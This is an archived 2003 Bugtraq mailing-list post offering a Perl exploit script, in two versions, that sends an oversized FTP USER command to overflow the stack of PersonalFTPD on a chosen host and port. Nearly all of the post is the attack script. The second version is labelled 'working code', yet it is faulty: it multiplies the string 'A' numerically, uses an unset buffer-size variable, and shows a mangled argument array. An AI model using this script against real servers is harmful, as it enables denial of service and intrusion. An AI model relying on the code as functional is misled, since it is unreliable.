Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Remote Stack Overflow exploit for Personal FTPD
From: subj <r2subj3ct () dwclan org>
Date: 8 May 2003 17:25:53 -0000

In-Reply-To: <20030508081123.13047.qmail () www securityfocus com>

Received: (qmail 20952 invoked from network); 8 May 2003 14:15:36 -0000
Received: from outgoing2.securityfocus.com (205.206.231.26)
 by mail.securityfocus.com with SMTP; 8 May 2003 14:15:36 -0000
Received: from lists.securityfocus.com (lists.securityfocus.com 
[205.206.231.19])
      by outgoing2.securityfocus.com (Postfix) with QMQP
      id ED2648F2D9; Thu,  8 May 2003 08:19:59 -0600 (MDT)
Mailing-List: contact bugtraq-help () securityfocus com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq () securityfocus com>
List-Help: <mailto:bugtraq-help () securityfocus com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe () securityfocus com>
List-Subscribe: <mailto:bugtraq-subscribe () securityfocus com>
Delivered-To: mailing list bugtraq () securityfocus com
Delivered-To: moderator for bugtraq () securityfocus com
Received: (qmail 22205 invoked from network); 8 May 2003 07:49:14 -0000
Date: 8 May 2003 08:11:23 -0000
Message-ID: <20030508081123.13047.qmail () www securityfocus com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: subj <r2subj3ct () dwclan org>
To: bugtraq () securityfocus com
Subject: Remote Stack Overflow exploit for Personal FTPD



#!/usr/bin/perl
use IO::Socket;

##########################################################
#                                                        #
# Remote Stack Overflow sploit for PersonalFTPD          #
# If wanna talk with me find me on irc                   #
# irc.irochka.net #dwc, #global, #phreack                #
# ###################################################### #
# thanx to kabuto, drG4njubas, fnq                       #
# gr33tz to dhg, gipshack, rsteam, blacktigerz           #
# D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0     #
# ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z            #
# ###################################################### #
# Vulnerability links:                                   #
# http://security.nnov.ru/search/document.asp?docid=4309 #
# http://www.securityfocus.com/archive/1/316958          #
#                                                        #
##########################################################

$data = "A";

print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n";
print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n";
print "[..]      by subj | dwc :: big 10x to Kabuto       [..]\n";
print "[..]    www.dwcgr0up.com www.dwcgr0up.com/subj/    [..]\n";
print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n";

$count_param= () ARGV;
$n="0";
if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer 
size\n\n"; exit; }
while ($n<$count_param) {
if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];}
if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];}
if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];}
$n++;
}
&connect;

sub connect 
{
$sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort 
=> "$port", 
Proto => "tcp")
       || die "Can\'t connect to $server port $port\n";
print $sock "USER $buffer\n";
print "Buffer has beens sended...";

}


close($sock);
exit;

--------------------------------------------------------------------------
I bring the apologies, has laid out not working version, simply was 
mistaken a file, before $sock it is necessary to add $buffer. = $data * 
$bsize;
Working code


#!/usr/bin/perl
use IO::Socket;

##########################################################
#                                                        #
# Remote Stack Overflow sploit for PersonalFTPD          #
# If wanna talk with me find me on irc                   #
# irc.irochka.net #dwc, #global, #phreack                #
# ###################################################### #
# thanx to kabuto, drG4njubas, fnq                       #
# gr33tz to dhg, gipshack, rsteam, blacktigerz           #
# D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0     #
# ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z            #
# ###################################################### #
# Vulnerability links:                                   #
# http://security.nnov.ru/search/document.asp?docid=4309 #
# http://www.securityfocus.com/archive/1/316958          #
#                                                        #
##########################################################

$data = "A";

print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n";
print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n";
print "[..]      by subj | dwc :: big 10x to Kabuto       [..]\n";
print "[..]    www.dwcgr0up.com www.dwcgr0up.com/subj/    [..]\n";
print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n";

$count_param= () ARGV;
$n="0";
if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer 
size\n\n"; exit; }
while ($n<$count_param) {
if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];}
if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];}
if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];}
$n++;
}
&connect;

sub connect 
{
$buffer.= $data * $bsize;
$sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort => "$port", 
Proto => "tcp")
        || die "Can\'t connect to $server port $port\n";
print $sock "USER $buffer\n";
print "Buffer has beens sended...";

}


close($sock);
exit;


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault